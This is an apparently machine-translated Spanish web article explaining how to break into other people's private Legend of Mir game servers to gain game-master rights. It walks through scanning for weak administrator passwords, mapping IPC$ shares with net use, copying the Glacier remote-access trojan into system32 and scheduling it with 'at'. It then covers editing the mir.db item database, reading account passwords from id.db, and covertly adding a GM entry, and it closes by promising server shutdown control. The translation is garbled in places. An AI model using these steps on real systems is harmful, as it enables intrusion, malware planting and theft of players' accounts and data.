Red de conocimiento informático - Material del sitio web - Cómo tener tu propia cuenta de GM en servidores privados legendarios de otras personas

Cómo tener tu propia cuenta de GM en servidores privados legendarios de otras personas

Es difícil conseguirlo. Tú +31347511 te lo diré. Vi que a algunos 4f les va bien, pero no son muy ricos y no tienen muchos maestros. Me gustó ser un novato en él, después de ingresar a su servidor y armar un escándalo. Ahora que he satisfecho mi adicción a los transgénicos, compartiré el método con todos. . . .

De hecho, el método que utilicé es muy sencillo, con sólo 4 herramientas:

(1): shed.exe

(2) Streamer 2000

(3) cmd.exe (en realidad es DOS en versión 2000)!

(4) Glacier 8.4 *Sistema operativo: servidor win2000 o sistema winxp. "shed.exe": De hecho, se utiliza para buscar recursos compartidos en línea. Es rápido y puede encontrar muchos archivos con interrupciones en el servicio. Sin embargo, no se puede acceder a algunas direcciones IP en el navegador. IP de Internet. jeje! Algunos directorios en algunos sitios web y servidores de cibercafés son compartidos, y se puede acceder a algunos, pero no se pueden eliminar, porque lo que se accede es anónimo, por lo que los permisos no son suficientes. Algunos requieren una contraseña. ¿Qué debo hacer si encuentro una contraseña? ¡Usa serpentina! Aunque "streamer" tiene restricciones en 202, no hay restricciones en las direcciones IP de libros pequeños *, ¡jaja! Entonces use la detección de IPC de Streamer, cree una conversación vacía, busque la lista de usuarios y luego realice una detección simple primero. En este momento, algunos administradores de red son vagos y configuran el administrador como demasiado simple. Jaja, puede detectarlo.

¿Qué hacer a continuación? Tal vez cuando verifique el puerto de la otra parte, descubra que la otra parte tiene muy pocos puertos abiertos, por ejemplo, ftp no está abierto. ¡Glaciar! "Binghe" debe haber sido jugado por muchos amigos. Usar Binghe para controlar un servidor es muy rápido (debido a que el ancho de banda del servidor es muy grande), puedes encontrar la página de inicio del host de la otra parte en unos minutos. ¿Pero cómo subirlo y controlarlo? "cmd.exe" es DOS en 2000. Ejecute cmd.exe y use el comando net.

Los pasos específicos son los siguientes:

El primer paso: net use \\ip \ipc $ “contraseña” /usuario:”usuario” Descripción: Utilice un nombre de superusuario para establecer una conexión con el sitio web que desea piratear. Por supuesto, el superusuario debe estar en el administrador del sitio web. La "ip" aquí es el host, la "contraseña" es la contraseña del superusuario y el "usuario" es el superusuario. Por ejemplo: net use \\210.248.250.2\ipc$ “maozhiie” /user:"maozhijie"

Paso 2: copie g-server.exe \\ip\admin$\system32 Descripción: g- server.exe es el servidor remoto de Glacier. Significado: copie este archivo al directorio system32 en winnt en el host de la otra parte. Quizás alguien quiera preguntar dónde se puede detectar el caballo de Troya cuando invade a la otra parte, ¡jaja! Probablemente sea posible instalar un firewall, ¡pero muchos hosts no tienen dinero para comprarlo! ¡A diferencia de China, donde las copias pirateadas están por todas partes! ¡Está bien si tienes el último troyano! ¡Esto es lo mejor! ! Jeje...

Paso 3: hora neta \\ip Verifique la hora del servidor de la otra parte. ¡Debido a la diferencia horaria, debería ser una hora! Por lo tanto, debe basarse en la hora del servidor de la otra parte.

Paso 4: a la hora \\ip g-server.exe La hora aquí es la hora del host de la otra parte. Función: Ejecutar el programa a la hora especificada. Por ejemplo, en \\210.248.250.2 19:55 g-server.exe Paso 5: Glacier puede controlar la computadora. ¡No hablaré más de esto, jaja! Un software que incluso un principiante puede jugar.

Ahora podemos controlar el servidor,

net use * \\ip\*$ mapeo remoto

Mira esto

Allí son los datos de todos en mir.db y no están cifrados. Puede usar el acceso para encontrarlos y cambiarlos. Cambie algunos elementos de alta calidad, como la espada de madera de ataque 0-80, 0. -50 El anillo hexagonal del diablo o algo así, eso depende de ti. Es tan molesto. jeje.

Por ejemplo, armas, el formato de datos es el siguiente (todo en hexadecimal)

** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a

El primero ** es el código del artículo, y luego 0xce 00 es el código del arma (el bit más alto es el último), que corresponde a la base de datos del artículo,

Ejemplo: Asesino en la base de datos del artículo El número de serie del dragón (idx) es 205, que corresponde a (205+1) convertido a hexadecimal y es ce

El siguiente 43 12 es la durabilidad actual, y 88 13 es la máxima durabilidad.

Ejemplo: 43 12 convertido a decimal es 17170 y la durabilidad es 17

Los siguientes 01 02 03 son ataque, magia y taoísmo en orden.

Ten en cuenta que está basado en el arma original.

Ejemplo: El dragón que mata arriba muestra ataque: 5-36, taoísmo: 0-2, magia: 0-3.

Los siguientes 04 05 06 07 08 09 son la suerte, maldición, precisión, velocidad de ataque y fuerza del arma en orden.

El 0 seguido de los dos últimos espacios indica si el arma ha sido entrenada Específicamente

Al agregar ataque al arma:

Antes del entrenamiento: 00 <. /p>

Después de la práctica: 0a

Después de la prueba exitosa: 00, el valor de ataque aumentó.

En cuanto a las joyas y la ropa, investiga por tu cuenta. Mucha gente lo sabe, así que no entré en detalles. Hay artículos sobre esto en Internet, así que no necesito decir más, ¿verdad?

Luego vaya a |mirserver\mud2\logsrv\iddb

Hay un id.db donde están las cuentas y contraseñas de todos, puedes averiguarlo, pero no robarlo. No es una cuestión de honor usar la cuenta de otra persona. Nunca lo hago, solo uso la cuenta de GM para recargarla. Jaja

Aquí, te agregaré a la lista de administradores de este servidor mientras caminas Jaja, aquí hay una analogía, agrega tu nombre aquí), luego, vamos a mir.db para encontrar el gm. cuenta y luego busque la contraseña de esta cuenta en id.db. Vale, vale, entra al juego con tu cuenta de gm (Mámalo antes de entrar, no dejes que otros se enteren y no cambies su contraseña, sería malo que otros se enteraran, jaja). Escriba el comando @reloadadmin. Sal de inmediato.

Luego, elimina los personajes que agregaste a la lista de administración de la lista de administración. Bueno, puedes ingresar al juego. Eres un GM, ¡pero el verdadero GM no verá tu nombre en el servidor! ! Quizás esté pensando: "¿Qué está pasando aquí? ¿Parece que hay un GM?". Jaja, pero no vayas demasiado lejos, de lo contrario perderás tu permiso si alguien lo recarga.

En este punto, el sueño de todos de tener un GM está completo. A continuación, hablaré sobre cómo controlar remotamente el host del servidor, como apagarlo y reiniciarlo.